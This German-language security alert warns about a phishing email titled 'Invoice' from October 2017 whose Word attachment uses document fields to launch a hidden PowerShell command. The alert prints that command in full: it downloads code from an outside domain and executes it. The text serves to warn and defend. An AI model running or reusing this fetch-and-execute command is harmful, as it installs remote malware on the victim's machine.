Invoice von Gloria ([email protected]) nicht öffnen!
Am Freitag, den 20. Oktober 2017 wurde durch unbekannte Dritte die folgende betrügerische E-Mail versendet. Achtung: Das Word-Dokument enthält einen Powershell-Befehl zum Aufruf einer bösartigen Datei! Öffnen Sie daher nicht das Word-Dokument!
Betreff: Invoice
Absender: Gloria ([email protected])
Achtung: Es handelt sich um eine gefälschte E-Mail! Öffnen Sie daher nicht das Word-Dokument!
Als Anlage ist eine Datei „DC000829.doc“ beigefügt. Bereits beim Öffnen kommt eine Meldung.
Microsoft Word
Dieses Dokument enthält Felder, die möglicherweise auf andere Dateien verweisen. Möchten Sie die Felder in diesem Dokument aktualisieren?
Ja Nein Hilfe
Anschließend würde eine weitere Meldung erscheinen, dass ein Powershell-Befehl ausgeführt wird. Dieser befindet sich im XML-Inhalt der Datei:
C:\\Windows\\System32\\cmd.exe “ /k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‚http://missinglynxsystems.com/hjergf76‘); powershell -e $e „
Von der Domain missinglynxsystems.com/hjergf76 soll eine Datei geladen werden. Aufgrund einer Fehlermeldung ist das aber zeitweise nicht erfolgreich. Öffnen Sie dennoch nicht das Dokument, da die Datei jederzeit wieder zur Verfügung stehen könnte!